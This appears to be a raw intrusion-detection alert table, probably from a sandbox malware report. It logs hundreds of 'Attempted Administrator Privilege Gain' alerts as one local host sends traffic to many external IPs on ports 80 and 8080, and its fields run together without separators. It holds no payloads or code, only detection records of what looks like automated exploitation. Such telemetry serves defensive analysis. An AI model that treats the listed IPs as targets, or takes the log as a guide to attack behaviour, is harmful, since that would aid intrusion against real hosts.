                            2024-11-28T07:28:21.582403+010020292151Attempted Administrator Privilege Gain192.168.2.235425227.224.177.18880TCP
                            2024-11-28T07:28:21.583511+010020292151Attempted Administrator Privilege Gain192.168.2.235216093.175.168.1558080TCP
                            2024-11-28T07:28:21.586851+010020292151Attempted Administrator Privilege Gain192.168.2.2353268212.67.65.968080TCP
                            2024-11-28T07:28:21.587599+010020292151Attempted Administrator Privilege Gain192.168.2.2334816143.125.99.608080TCP
                            2024-11-28T07:28:21.593185+010020292151Attempted Administrator Privilege Gain192.168.2.235482467.150.217.16280TCP
                            2024-11-28T07:28:21.593918+010020292151Attempted Administrator Privilege Gain192.168.2.2348550163.29.225.10980TCP
                            2024-11-28T07:28:21.595453+010020292151Attempted Administrator Privilege Gain192.168.2.234088213.117.120.12980TCP
                            2024-11-28T07:28:21.598698+010020292151Attempted Administrator Privilege Gain192.168.2.2342588150.149.68.2008080TCP
                            2024-11-28T07:28:21.599480+010020292151Attempted Administrator Privilege Gain192.168.2.234435268.164.136.2148080TCP
                            2024-11-28T07:28:21.600597+010020292151Attempted Administrator Privilege Gain192.168.2.2349260171.64.132.1848080TCP
                            2024-11-28T07:28:21.604658+010020292151Attempted Administrator Privilege Gain192.168.2.23391768.153.189.2118080TCP
                            2024-11-28T07:28:21.607943+010020292151Attempted Administrator Privilege Gain192.168.2.235902439.56.166.8080TCP
                            2024-11-28T07:28:21.608309+010020292151Attempted Administrator Privilege Gain192.168.2.2342084217.237.30.8980TCP
                            2024-11-28T07:28:21.609770+010020292151Attempted Administrator Privilege Gain192.168.2.23475246.220.203.2098080TCP
                            2024-11-28T07:28:21.610127+010020292151Attempted Administrator Privilege Gain192.168.2.234609214.231.177.4780TCP
                            2024-11-28T07:28:21.610851+010020292151Attempted Administrator Privilege Gain192.168.2.2358570111.178.117.7980TCP
                            2024-11-28T07:28:21.611951+010020292151Attempted Administrator Privilege Gain192.168.2.235977087.28.80.2138080TCP
                            2024-11-28T07:28:21.613400+010020292151Attempted Administrator Privilege Gain192.168.2.234361289.118.233.398080TCP
                            2024-11-28T07:28:32.549793+010020292151Attempted Administrator Privilege Gain192.168.2.2353358191.216.182.11980TCP
                            2024-11-28T07:28:32.565842+010020292151Attempted Administrator Privilege Gain192.168.2.2338178116.234.135.280TCP
                            2024-11-28T07:28:32.584872+010020292151Attempted Administrator Privilege Gain192.168.2.23352605.184.240.24380TCP
                            2024-11-28T07:28:33.437950+010020292151Attempted Administrator Privilege Gain192.168.2.2358480102.29.6.1228080TCP
                            2024-11-28T07:28:33.527909+010020292151Attempted Administrator Privilege Gain192.168.2.2348456134.115.173.2378080TCP
                            2024-11-28T07:28:33.551825+010020292151Attempted Administrator Privilege Gain192.168.2.234278426.96.28.188080TCP
                            2024-11-28T07:28:35.511142+010020292151Attempted Administrator Privilege Gain192.168.2.2349448134.188.155.20580TCP
                            2024-11-28T07:28:35.518264+010020292151Attempted Administrator Privilege Gain192.168.2.2345426166.84.151.18080TCP
                            2024-11-28T07:28:35.519002+010020292151Attempted Administrator Privilege Gain192.168.2.2342848211.160.145.5380TCP
                            2024-11-28T07:28:35.590732+010020292151Attempted Administrator Privilege Gain192.168.2.235261277.9.136.788080TCP
                            2024-11-28T07:28:35.591471+010020292151Attempted Administrator Privilege Gain192.168.2.233820469.166.73.1888080TCP
                            2024-11-28T07:28:35.606921+010020292151Attempted Administrator Privilege Gain192.168.2.2347522181.72.37.5880TCP
                            2024-11-28T07:28:35.607659+010020292151Attempted Administrator Privilege Gain192.168.2.2355244186.36.111.1398080TCP
                            2024-11-28T07:28:39.549853+010020292151Attempted Administrator Privilege Gain192.168.2.2342354154.79.187.21180TCP
                            2024-11-28T07:28:39.574593+010020292151Attempted Administrator Privilege Gain192.168.2.233523092.35.26.11480TCP
                            2024-11-28T07:28:39.597422+010020292151Attempted Administrator Privilege Gain192.168.2.2356152105.8.172.698080TCP
                            2024-11-28T07:28:40.528444+010020292151Attempted Administrator Privilege Gain192.168.2.2334340102.19.97.23480TCP
                            2024-11-28T07:28:40.537912+010020292151Attempted Administrator Privilege Gain192.168.2.2357678166.5.230.9080TCP
                            2024-11-28T07:28:40.599364+010020292151Attempted Administrator Privilege Gain192.168.2.2340410191.176.82.418080TCP
                            2024-11-28T07:28:40.605973+010020292151Attempted Administrator Privilege Gain192.168.2.234278620.197.222.3880TCP
                            2024-11-28T07:28:40.606343+010020292151Attempted Administrator Privilege Gain192.168.2.2335804124.161.90.25380TCP
                            2024-11-28T07:28:40.606719+010020292151Attempted Administrator Privilege Gain192.168.2.235368825.51.224.2418080TCP
                            2024-11-28T07:28:42.508780+010020292151Attempted Administrator Privilege Gain192.168.2.2343270112.166.216.148080TCP
                            2024-11-28T07:28:42.511857+010020292151Attempted Administrator Privilege Gain192.168.2.235563258.156.77.13980TCP
                            2024-11-28T07:28:42.512239+010020292151Attempted Administrator Privilege Gain192.168.2.233289639.231.118.708080TCP
                            2024-11-28T07:28:42.574990+010020292151Attempted Administrator Privilege Gain192.168.2.2349372193.97.201.8980TCP
                            2024-11-28T07:28:42.581337+010020292151Attempted Administrator Privilege Gain192.168.2.235651668.202.31.2438080TCP
                            2024-11-28T07:28:42.608897+010020292151Attempted Administrator Privilege Gain192.168.2.233852017.41.138.13980TCP
                            2024-11-28T07:28:43.539809+010020292151Attempted Administrator Privilege Gain192.168.2.234809438.234.0.3180TCP
                            2024-11-28T07:28:43.545281+010020292151Attempted Administrator Privilege Gain192.168.2.2360108206.69.196.548080TCP
                            2024-11-28T07:28:43.592981+010020292151Attempted Administrator Privilege Gain192.168.2.2341814126.11.35.1728080TCP
                            2024-11-28T07:28:43.606699+010020292151Attempted Administrator Privilege Gain192.168.2.235850228.211.70.2168080TCP
                            2024-11-28T07:28:44.511852+010020292151Attempted Administrator Privilege Gain192.168.2.235124884.26.53.778080TCP
                            2024-11-28T07:28:44.540248+010020292151Attempted Administrator Privilege Gain192.168.2.2338022184.181.121.8480TCP
                            2024-11-28T07:28:44.564416+010020292151Attempted Administrator Privilege Gain192.168.2.2340738133.234.194.978080TCP
                            2024-11-28T07:28:45.585149+010020292151Attempted Administrator Privilege Gain192.168.2.23433824.155.205.2508080TCP
                            2024-11-28T07:28:46.383948+010020292151Attempted Administrator Privilege Gain192.168.2.233355236.37.163.12680TCP
                            2024-11-28T07:28:46.507202+010020292151Attempted Administrator Privilege Gain192.168.2.2352712109.187.50.19280TCP
                            2024-11-28T07:28:46.510809+010020292151Attempted Administrator Privilege Gain192.168.2.2350532213.49.162.780TCP
                            2024-11-28T07:28:46.550829+010020292151Attempted Administrator Privilege Gain192.168.2.234248867.225.203.218080TCP
                            2024-11-28T07:28:46.579184+010020292151Attempted Administrator Privilege Gain192.168.2.2343288161.107.176.20080TCP
                            2024-11-28T07:28:47.528027+010020292151Attempted Administrator Privilege Gain192.168.2.235856052.216.119.318080TCP
                            2024-11-28T07:28:49.558511+010020292151Attempted Administrator Privilege Gain192.168.2.2344136189.235.157.1480TCP
                            2024-11-28T07:28:49.563626+010020292151Attempted Administrator Privilege Gain192.168.2.2360018141.91.48.708080TCP
                            2024-11-28T07:28:50.537237+010020292151Attempted Administrator Privilege Gain192.168.2.2350392102.205.133.13580TCP
                            2024-11-28T07:28:50.569241+010020292151Attempted Administrator Privilege Gain192.168.2.2335990157.9.207.2280TCP
                            2024-11-28T07:28:50.576476+010020292151Attempted Administrator Privilege Gain192.168.2.2343228117.188.27.138080TCP
                            2024-11-28T07:28:50.589687+010020292151Attempted Administrator Privilege Gain192.168.2.235109427.187.181.11580TCP
                            2024-11-28T07:28:51.516853+010020292151Attempted Administrator Privilege Gain192.168.2.2357440121.221.252.2680TCP
                            2024-11-28T07:28:51.545338+010020292151Attempted Administrator Privilege Gain192.168.2.233700035.76.164.7380TCP
                            2024-11-28T07:28:51.569057+010020292151Attempted Administrator Privilege Gain192.168.2.2355676148.149.231.1488080TCP
                            2024-11-28T07:28:52.511388+010020292151Attempted Administrator Privilege Gain192.168.2.2355804122.36.64.22080TCP
                            2024-11-28T07:28:53.512108+010020292151Attempted Administrator Privilege Gain192.168.2.235450463.141.154.2528080TCP
                            2024-11-28T07:28:53.531115+010020292151Attempted Administrator Privilege Gain192.168.2.2335316166.239.65.818080TCP
                            2024-11-28T07:28:53.535562+010020292151Attempted Administrator Privilege Gain192.168.2.2360138156.139.150.11580TCP
                            2024-11-28T07:28:53.546560+010020292151Attempted Administrator Privilege Gain192.168.2.233544847.226.143.16280TCP
                            2024-11-28T07:28:53.601318+010020292151Attempted Administrator Privilege Gain192.168.2.2352540142.227.211.16480TCP
                            2024-11-28T07:28:54.423349+010020292151Attempted Administrator Privilege Gain192.168.2.2341994182.176.99.268080TCP
                            2024-11-28T07:28:54.582636+010020292151Attempted Administrator Privilege Gain192.168.2.234247836.196.135.2358080TCP
                            2024-11-28T07:28:55.510451+010020292151Attempted Administrator Privilege Gain192.168.2.23415544.178.55.7180TCP
                            2024-11-28T07:28:55.548323+010020292151Attempted Administrator Privilege Gain192.168.2.2348258183.208.109.25380TCP
                            2024-11-28T07:28:56.586276+010020292151Attempted Administrator Privilege Gain192.168.2.2344526174.144.195.8780TCP
                            2024-11-28T07:28:56.587058+010020292151Attempted Administrator Privilege Gain192.168.2.2354544100.223.244.1180TCP
                            2024-11-28T07:28:56.596945+010020292151Attempted Administrator Privilege Gain192.168.2.235654067.86.61.2080TCP
                            2024-11-28T07:28:57.508855+010020292151Attempted Administrator Privilege Gain192.168.2.234539456.79.248.1388080TCP
                            2024-11-28T07:28:57.532845+010020292151Attempted Administrator Privilege Gain192.168.2.2335010138.63.57.1678080TCP
                            2024-11-28T07:28:57.582123+010020292151Attempted Administrator Privilege Gain192.168.2.233617083.87.249.138080TCP
                            2024-11-28T07:28:57.609809+010020292151Attempted Administrator Privilege Gain192.168.2.235334860.219.84.9880TCP
                            2024-11-28T07:28:58.543147+010020292151Attempted Administrator Privilege Gain192.168.2.234783854.119.208.6580TCP
                            2024-11-28T07:29:00.537421+010020292151Attempted Administrator Privilege Gain192.168.2.23440346.189.246.3180TCP
                            2024-11-28T07:29:00.550567+010020292151Attempted Administrator Privilege Gain192.168.2.235579818.99.224.1080TCP
                            2024-11-28T07:29:01.504503+010020292151Attempted Administrator Privilege Gain192.168.2.2359514189.71.235.11180TCP
                            2024-11-28T07:29:01.535513+010020292151Attempted Administrator Privilege Gain192.168.2.2357976115.35.224.298080TCP
                            2024-11-28T07:29:01.611610+010020292151Attempted Administrator Privilege Gain192.168.2.234819617.117.57.16780TCP
                            2024-11-28T07:29:02.552581+010020292151Attempted Administrator Privilege Gain192.168.2.2355782215.195.170.10380TCP
                            2024-11-28T07:29:03.542169+010020292151Attempted Administrator Privilege Gain192.168.2.234929020.14.91.2378080TCP
                            2024-11-28T07:29:03.542699+010020292151Attempted Administrator Privilege Gain192.168.2.2343466108.164.78.2268080TCP
                            2024-11-28T07:29:04.560337+010020292151Attempted Administrator Privilege Gain192.168.2.235367466.50.61.6180TCP
                            2024-11-28T07:29:05.540240+010020292151Attempted Administrator Privilege Gain192.168.2.2350634126.153.201.4680TCP
                            2024-11-28T07:29:06.499824+010020292151Attempted Administrator Privilege Gain192.168.2.2353716104.127.76.7180TCP
                            2024-11-28T07:29:06.503828+010020292151Attempted Administrator Privilege Gain192.168.2.2351524136.134.157.2780TCP
                            2024-11-28T07:29:06.504191+010020292151Attempted Administrator Privilege Gain192.168.2.233536818.11.140.738080TCP
                            2024-11-28T07:29:06.504558+010020292151Attempted Administrator Privilege Gain192.168.2.235052274.49.223.38080TCP
                            2024-11-28T07:29:06.510807+010020292151Attempted Administrator Privilege Gain192.168.2.2357550222.26.159.6080TCP
                            2024-11-28T07:29:06.528380+010020292151Attempted Administrator Privilege Gain192.168.2.2335772143.127.108.1068080TCP
                            2024-11-28T07:29:06.606518+010020292151Attempted Administrator Privilege Gain192.168.2.2358956153.188.222.11380TCP
                            2024-11-28T07:29:07.516520+010020292151Attempted Administrator Privilege Gain192.168.2.234204892.199.43.1188080TCP
                            2024-11-28T07:29:07.533687+010020292151Attempted Administrator Privilege Gain192.168.2.2360792133.54.102.768080TCP
                            2024-11-28T07:29:07.597167+010020292151Attempted Administrator Privilege Gain192.168.2.2347828151.249.26.1348080TCP
                            2024-11-28T07:29:08.530757+010020292151Attempted Administrator Privilege Gain192.168.2.2355434173.13.157.328080TCP
                            2024-11-28T07:29:08.545711+010020292151Attempted Administrator Privilege Gain192.168.2.234889898.3.111.17380TCP
                            2024-11-28T07:29:08.578664+010020292151Attempted Administrator Privilege Gain192.168.2.2333594107.169.43.12580TCP
                            2024-11-28T07:29:08.582747+010020292151Attempted Administrator Privilege Gain192.168.2.2345268155.180.226.348080TCP
                            2024-11-28T07:29:09.574718+010020292151Attempted Administrator Privilege Gain192.168.2.234344648.138.159.4880TCP
                            2024-11-28T07:29:10.510961+010020292151Attempted Administrator Privilege Gain192.168.2.2340428141.97.17.2508080TCP
                            2024-11-28T07:29:10.544297+010020292151Attempted Administrator Privilege Gain192.168.2.2348762181.97.41.9280TCP
                            2024-11-28T07:29:10.595516+010020292151Attempted Administrator Privilege Gain192.168.2.2337970153.48.91.168080TCP
                            2024-11-28T07:29:11.532786+010020292151Attempted Administrator Privilege Gain192.168.2.2341778151.70.49.17980TCP
                            2024-11-28T07:29:12.553962+010020292151Attempted Administrator Privilege Gain192.168.2.234123027.51.44.6480TCP
                            2024-11-28T07:29:13.139750+010020292151Attempted Administrator Privilege Gain192.168.2.2351012188.40.107.1380TCP
                            2024-11-28T07:29:13.564709+010020292151Attempted Administrator Privilege Gain192.168.2.2335498110.123.50.2008080TCP
                            2024-11-28T07:29:13.588173+010020292151Attempted Administrator Privilege Gain192.168.2.2356580108.49.99.1680TCP
                            2024-11-28T07:29:15.508628+010020292151Attempted Administrator Privilege Gain192.168.2.2360928106.239.233.508080TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-28T07:28:20.742304+010020270631Attempted Administrator Privilege Gain192.168.2.233426230.84.48.13080TCP
                            2024-11-28T07:28:20.773895+010020270631Attempted Administrator Privilege Gain192.168.2.235308868.228.150.778080TCP
                            2024-11-28T07:28:20.773975+010020270631Attempted Administrator Privilege Gain192.168.2.234926255.92.215.8380TCP
                            2024-11-28T07:28:20.774430+010020270631Attempted Administrator Privilege Gain192.168.2.2338934140.221.39.24280TCP
                            2024-11-28T07:28:20.804549+010020270631Attempted Administrator Privilege Gain192.168.2.2343916105.45.143.15580TCP
                            2024-11-28T07:28:20.929621+010020270631Attempted Administrator Privilege Gain192.168.2.234522211.190.108.11780TCP
                            2024-11-28T07:28:20.929627+010020270631Attempted Administrator Privilege Gain192.168.2.2345012137.62.189.19380TCP
                            2024-11-28T07:28:20.930524+010020270631Attempted Administrator Privilege Gain192.168.2.23490309.179.110.1118080TCP
                            2024-11-28T07:28:20.931940+010020270631Attempted Administrator Privilege Gain192.168.2.2336598152.206.32.1378080TCP
                            2024-11-28T07:28:20.932029+010020270631Attempted Administrator Privilege Gain192.168.2.2353006180.158.189.19080TCP
                            2024-11-28T07:28:20.932073+010020270631Attempted Administrator Privilege Gain192.168.2.23357649.31.4.1418080TCP
                            2024-11-28T07:28:20.937493+010020270631Attempted Administrator Privilege Gain192.168.2.2351822120.121.182.1558080TCP
                            2024-11-28T07:28:21.049788+010020270631Attempted Administrator Privilege Gain192.168.2.233417815.238.152.12780TCP
                            2024-11-28T07:28:21.052153+010020270631Attempted Administrator Privilege Gain192.168.2.2346204153.97.17.1958080TCP
                            2024-11-28T07:28:21.052215+010020270631Attempted Administrator Privilege Gain192.168.2.235197628.36.92.24280TCP
                            2024-11-28T07:28:21.169901+010020270631Attempted Administrator Privilege Gain192.168.2.2344862214.89.56.22980TCP
                            2024-11-28T07:28:21.169914+010020270631Attempted Administrator Privilege Gain192.168.2.235262452.116.215.21080TCP
                            2024-11-28T07:28:21.169914+010020270631Attempted Administrator Privilege Gain192.168.2.233408675.89.77.20680TCP
                            2024-11-28T07:28:21.169953+010020270631Attempted Administrator Privilege Gain192.168.2.235849281.241.101.28080TCP
                            2024-11-28T07:28:21.170264+010020270631Attempted Administrator Privilege Gain192.168.2.235702424.158.93.2358080TCP
                            2024-11-28T07:28:21.170282+010020270631Attempted Administrator Privilege Gain192.168.2.2357430109.90.191.1758080TCP
                            2024-11-28T07:28:21.170369+010020270631Attempted Administrator Privilege Gain192.168.2.2358462170.20.179.2318080TCP
                            2024-11-28T07:28:21.170378+010020270631Attempted Administrator Privilege Gain192.168.2.235095058.130.138.13180TCP
                            2024-11-28T07:28:21.170533+010020270631Attempted Administrator Privilege Gain192.168.2.236060828.115.34.20780TCP
                            2024-11-28T07:28:21.170616+010020270631Attempted Administrator Privilege Gain192.168.2.2346996136.27.141.238080TCP
                            2024-11-28T07:28:21.170774+010020270631Attempted Administrator Privilege Gain192.168.2.235446440.134.41.14780TCP
                            2024-11-28T07:28:21.170823+010020270631Attempted Administrator Privilege Gain192.168.2.2346042193.206.30.2108080TCP
                            2024-11-28T07:28:21.170847+010020270631Attempted Administrator Privilege Gain192.168.2.2345848131.57.28.1818080TCP
                            2024-11-28T07:28:21.170877+010020270631Attempted Administrator Privilege Gain192.168.2.2345072209.161.87.328080TCP
                            2024-11-28T07:28:21.170907+010020270631Attempted Administrator Privilege Gain192.168.2.2349042142.0.210.2538080TCP
                            2024-11-28T07:28:21.170970+010020270631Attempted Administrator Privilege Gain192.168.2.2359610103.210.62.10380TCP
                            2024-11-28T07:28:21.171006+010020270631Attempted Administrator Privilege Gain192.168.2.2346302187.46.100.11180TCP
                            2024-11-28T07:28:21.171058+010020270631Attempted Administrator Privilege Gain192.168.2.2337136197.96.116.13580TCP
                            2024-11-28T07:28:21.171084+010020270631Attempted Administrator Privilege Gain192.168.2.23536189.27.194.1498080TCP
                            2024-11-28T07:28:21.171192+010020270631Attempted Administrator Privilege Gain192.168.2.2354816167.138.9.25180TCP
                            2024-11-28T07:28:21.171213+010020270631Attempted Administrator Privilege Gain192.168.2.233741444.153.13.580TCP
                            2024-11-28T07:28:21.171242+010020270631Attempted Administrator Privilege Gain192.168.2.235021268.10.114.2480TCP
                            2024-11-28T07:28:21.423506+010020270631Attempted Administrator Privilege Gain192.168.2.2336546217.237.6.18880TCP
                            2024-11-28T07:28:21.657581+010020270631Attempted Administrator Privilege Gain192.168.2.2333380176.126.172.17480TCP
                            2024-11-28T07:28:24.142146+010020270631Attempted Administrator Privilege Gain192.168.2.2342400102.193.207.1468080TCP
                            2024-11-28T07:28:31.705188+010020270631Attempted Administrator Privilege Gain192.168.2.2346222122.119.110.13980TCP
                            2024-11-28T07:28:31.814410+010020270631Attempted Administrator Privilege Gain192.168.2.2339868209.78.212.218080TCP
                            2024-11-28T07:28:31.851813+010020270631Attempted Administrator Privilege Gain192.168.2.2344986191.45.226.738080TCP
                            2024-11-28T07:28:31.892674+010020270631Attempted Administrator Privilege Gain192.168.2.2351316215.40.71.268080TCP
                            2024-11-28T07:28:31.939392+010020270631Attempted Administrator Privilege Gain192.168.2.2355336130.67.243.68080TCP
                            2024-11-28T07:28:31.961794+010020270631Attempted Administrator Privilege Gain192.168.2.235759875.158.5.1398080TCP
                            2024-11-28T07:28:31.986325+010020270631Attempted Administrator Privilege Gain192.168.2.2357650156.166.198.1608080TCP
                            2024-11-28T07:28:32.001892+010020270631Attempted Administrator Privilege Gain192.168.2.2332862218.240.42.1078080TCP
                            2024-11-28T07:28:32.008217+010020270631Attempted Administrator Privilege Gain192.168.2.233746614.55.151.4080TCP
                            2024-11-28T07:28:32.305030+010020270631Attempted Administrator Privilege Gain192.168.2.2354842109.73.44.11580TCP
                            2024-11-28T07:28:32.305281+010020270631Attempted Administrator Privilege Gain192.168.2.235589819.97.225.2328080TCP
                            2024-11-28T07:28:32.345534+010020270631Attempted Administrator Privilege Gain192.168.2.233465014.206.36.6780TCP
                            2024-11-28T07:28:32.351877+010020270631Attempted Administrator Privilege Gain192.168.2.2353776196.163.229.2980TCP
                            2024-11-28T07:28:32.361157+010020270631Attempted Administrator Privilege Gain192.168.2.234591499.57.40.1748080TCP
                            2024-11-28T07:28:32.384417+010020270631Attempted Administrator Privilege Gain192.168.2.2350310119.24.183.338080TCP
                            2024-11-28T07:28:32.392155+010020270631Attempted Administrator Privilege Gain192.168.2.234912463.216.152.23780TCP
                            2024-11-28T07:28:32.392639+010020270631Attempted Administrator Privilege Gain192.168.2.235627658.13.152.918080TCP
                            2024-11-28T07:28:32.398990+010020270631Attempted Administrator Privilege Gain192.168.2.235011863.93.5.5380TCP
                            2024-11-28T07:28:32.414521+010020270631Attempted Administrator Privilege Gain192.168.2.2334448108.32.60.1798080TCP
                            2024-11-28T07:28:32.415172+010020270631Attempted Administrator Privilege Gain192.168.2.234958020.60.103.14780TCP
                            2024-11-28T07:28:32.429916+010020270631Attempted Administrator Privilege Gain192.168.2.2339610105.99.123.1738080TCP
                            2024-11-28T07:28:32.461346+010020270631Attempted Administrator Privilege Gain192.168.2.2348266125.76.215.128080TCP
                            2024-11-28T07:28:32.470806+010020270631Attempted Administrator Privilege Gain192.168.2.2359062152.17.230.20780TCP
                            2024-11-28T07:28:32.477965+010020270631Attempted Administrator Privilege Gain192.168.2.2357344188.62.117.11380TCP
                            2024-11-28T07:28:32.486259+010020270631Attempted Administrator Privilege Gain192.168.2.2353220191.108.27.8380TCP
                            2024-11-28T07:28:32.492816+010020270631Attempted Administrator Privilege Gain192.168.2.233283476.152.169.20880TCP
                            2024-11-28T07:28:32.492953+010020270631Attempted Administrator Privilege Gain192.168.2.235507665.55.17.338080TCP
                            2024-11-28T07:28:32.508619+010020270631Attempted Administrator Privilege Gain192.168.2.2351846166.252.165.1428080TCP
                            2024-11-28T07:28:32.518013+010020270631Attempted Administrator Privilege Gain192.168.2.235517678.194.76.18980TCP
                            2024-11-28T07:28:32.523802+010020270631Attempted Administrator Privilege Gain192.168.2.234620898.140.243.1648080TCP
                            2024-11-28T07:28:32.533031+010020270631Attempted Administrator Privilege Gain192.168.2.2341004145.189.228.4680TCP
                            2024-11-28T07:28:32.539852+010020270631Attempted Administrator Privilege Gain192.168.2.235213071.53.95.738080TCP
                            2024-11-28T07:28:32.548657+010020270631Attempted Administrator Privilege Gain192.168.2.2334854176.190.233.758080TCP
                            2024-11-28T07:28:32.554930+010020270631Attempted Administrator Privilege Gain192.168.2.2348530121.133.146.208080TCP
                            2024-11-28T07:28:32.595545+010020270631Attempted Administrator Privilege Gain192.168.2.234979236.30.167.448080TCP
                            2024-11-28T07:28:32.596301+010020270631Attempted Administrator Privilege Gain192.168.2.2340128102.244.106.848080TCP
                            2024-11-28T07:28:43.633718+010020270631Attempted Administrator Privilege Gain192.168.2.2344182142.207.82.4180TCP
                            2024-11-28T07:28:43.799105+010020270631Attempted Administrator Privilege Gain192.168.2.2350920160.236.191.2338080TCP
                            2024-11-28T07:28:43.799141+010020270631Attempted Administrator Privilege Gain192.168.2.2335996121.230.95.9980TCP
                            2024-11-28T07:28:43.924490+010020270631Attempted Administrator Privilege Gain192.168.2.2338054109.85.10.608080TCP
                            2024-11-28T07:28:43.924580+010020270631Attempted Administrator Privilege Gain192.168.2.235888651.218.144.208080TCP
                            2024-11-28T07:28:43.930549+010020270631Attempted Administrator Privilege Gain192.168.2.2349294143.224.20.18880TCP
                            2024-11-28T07:28:44.711962+010020270631Attempted Administrator Privilege Gain192.168.2.234356070.21.24.2128080TCP
                            2024-11-28T07:28:44.814891+010020270631Attempted Administrator Privilege Gain192.168.2.233469082.44.161.23180TCP
                            2024-11-28T07:28:45.471757+010020270631Attempted Administrator Privilege Gain192.168.2.2335288211.126.112.1798080TCP
                            2024-11-28T07:28:46.712435+010020270631Attempted Administrator Privilege Gain192.168.2.233754033.213.94.858080TCP
                            2024-11-28T07:28:46.712444+010020270631Attempted Administrator Privilege Gain192.168.2.2338642161.129.248.20580TCP
                            2024-11-28T07:28:46.727546+010020270631Attempted Administrator Privilege Gain192.168.2.236029288.23.72.8580TCP
                            2024-11-28T07:28:46.727631+010020270631Attempted Administrator Privilege Gain192.168.2.233658632.73.167.2088080TCP
                            2024-11-28T07:28:46.805526+010020270631Attempted Administrator Privilege Gain192.168.2.2340954190.8.212.2058080TCP
                            2024-11-28T07:28:50.665274+010020270631Attempted Administrator Privilege Gain192.168.2.234898018.82.105.380TCP
                            2024-11-28T07:28:50.696222+010020270631Attempted Administrator Privilege Gain192.168.2.2337984184.26.224.318080TCP
                            2024-11-28T07:28:50.721249+010020270631Attempted Administrator Privilege Gain192.168.2.234550862.14.141.10680TCP
                            2024-11-28T07:28:50.774665+010020270631Attempted Administrator Privilege Gain192.168.2.2342174143.139.168.14880TCP
                            2024-11-28T07:28:50.861934+010020270631Attempted Administrator Privilege Gain192.168.2.2338334183.240.144.88080TCP
                            2024-11-28T07:28:51.743318+010020270631Attempted Administrator Privilege Gain192.168.2.2342138125.6.120.1508080TCP
                            2024-11-28T07:28:51.805860+010020270631Attempted Administrator Privilege Gain192.168.2.2354810135.245.8.1298080TCP
                            2024-11-28T07:28:51.821461+010020270631Attempted Administrator Privilege Gain192.168.2.234135450.4.239.16680TCP
                            2024-11-28T07:28:51.940162+010020270631Attempted Administrator Privilege Gain192.168.2.233359281.57.162.15980TCP
                            2024-11-28T07:28:53.737232+010020270631Attempted Administrator Privilege Gain192.168.2.2333030185.111.88.12780TCP
                            2024-11-28T07:28:53.799415+010020270631Attempted Administrator Privilege Gain192.168.2.2342938191.222.250.18480TCP
                            2024-11-28T07:28:53.815097+010020270631Attempted Administrator Privilege Gain192.168.2.2354856202.215.182.21980TCP
                            2024-11-28T07:28:53.846403+010020270631Attempted Administrator Privilege Gain192.168.2.2335458125.168.142.9680TCP
                            2024-11-28T07:28:54.705744+010020270631Attempted Administrator Privilege Gain192.168.2.2355096134.181.180.828080TCP
                            2024-11-28T07:28:54.721642+010020270631Attempted Administrator Privilege Gain192.168.2.2334662120.74.8.1580TCP
                            2024-11-28T07:28:57.665367+010020270631Attempted Administrator Privilege Gain192.168.2.235055089.195.203.1628080TCP
                            2024-11-28T07:28:57.665587+010020270631Attempted Administrator Privilege Gain192.168.2.23443107.197.38.11480TCP
                            2024-11-28T07:28:57.665671+010020270631Attempted Administrator Privilege Gain192.168.2.2359058214.55.27.2518080TCP
                            2024-11-28T07:28:57.743585+010020270631Attempted Administrator Privilege Gain192.168.2.2332836132.49.66.1578080TCP
                            2024-11-28T07:28:58.727918+010020270631Attempted Administrator Privilege Gain192.168.2.2343916222.208.184.5080TCP
                            2024-11-28T07:28:58.815360+010020270631Attempted Administrator Privilege Gain192.168.2.234208685.251.156.1358080TCP
                            2024-11-28T07:28:59.221679+010020270631Attempted Administrator Privilege Gain192.168.2.235584015.190.124.5680TCP
                            2024-11-28T07:29:00.706149+010020270631Attempted Administrator Privilege Gain192.168.2.2346224135.53.13.2118080TCP
                            2024-11-28T07:29:00.712376+010020270631Attempted Administrator Privilege Gain192.168.2.234747692.139.107.12580TCP
                            2024-11-28T07:29:01.774893+010020270631Attempted Administrator Privilege Gain192.168.2.23514709.158.147.2398080TCP
                            2024-11-28T07:29:01.799625+010020270631Attempted Administrator Privilege Gain192.168.2.234987291.224.230.6680TCP
                            2024-11-28T07:29:02.768350+010020270631Attempted Administrator Privilege Gain192.168.2.2333090162.29.10.118080TCP
                            2024-11-28T07:29:02.784158+010020270631Attempted Administrator Privilege Gain192.168.2.2348922107.51.18.1688080TCP
                            2024-11-28T07:29:03.415666+010020270631Attempted Administrator Privilege Gain192.168.2.2348890157.184.78.7380TCP
                            2024-11-28T07:29:03.817025+010020270631Attempted Administrator Privilege Gain192.168.2.2334620191.143.159.1718080TCP
                            2024-11-28T07:29:04.665658+010020270631Attempted Administrator Privilege Gain192.168.2.234917261.157.149.1188080TCP
                            2024-11-28T07:29:04.712408+010020270631Attempted Administrator Privilege Gain192.168.2.235008061.52.194.2338080TCP
                            2024-11-28T07:29:04.768525+010020270631Attempted Administrator Privilege Gain192.168.2.2359186203.55.84.1008080TCP
                            2024-11-28T07:29:05.784294+010020270631Attempted Administrator Privilege Gain192.168.2.2359082189.96.186.1018080TCP
                            2024-11-28T07:29:06.665845+010020270631Attempted Administrator Privilege Gain192.168.2.2349574140.158.65.1998080TCP
                            2024-11-28T07:29:06.674921+010020270631Attempted Administrator Privilege Gain192.168.2.234424051.93.70.19780TCP
                            2024-11-28T07:29:06.697874+010020270631Attempted Administrator Privilege Gain192.168.2.2336786168.241.230.88080TCP
                            2024-11-28T07:29:06.713198+010020270631Attempted Administrator Privilege Gain192.168.2.2359722172.158.193.2268080TCP
                            2024-11-28T07:29:06.759932+010020270631Attempted Administrator Privilege Gain192.168.2.2341926171.169.146.1578080TCP
                            2024-11-28T07:29:07.712636+010020270631Attempted Administrator Privilege Gain192.168.2.2332792135.114.48.838080TCP
                            2024-11-28T07:29:07.790867+010020270631Attempted Administrator Privilege Gain192.168.2.234185286.150.230.14180TCP
                            2024-11-28T07:29:07.838367+010020270631Attempted Administrator Privilege Gain192.168.2.2341808175.147.95.2780TCP
                            2024-11-28T07:29:09.721855+010020270631Attempted Administrator Privilege Gain192.168.2.233869080.152.5.1880TCP
                            2024-11-28T07:29:10.697142+010020270631Attempted Administrator Privilege Gain192.168.2.2338230118.209.168.118080TCP
                            2024-11-28T07:29:10.728179+010020270631Attempted Administrator Privilege Gain192.168.2.2349478163.150.75.778080TCP
                            2024-11-28T07:29:10.775214+010020270631Attempted Administrator Privilege Gain192.168.2.235279416.185.70.748080TCP
                            2024-11-28T07:29:11.400280+010020270631Attempted Administrator Privilege Gain192.168.2.234001073.187.21.11380TCP
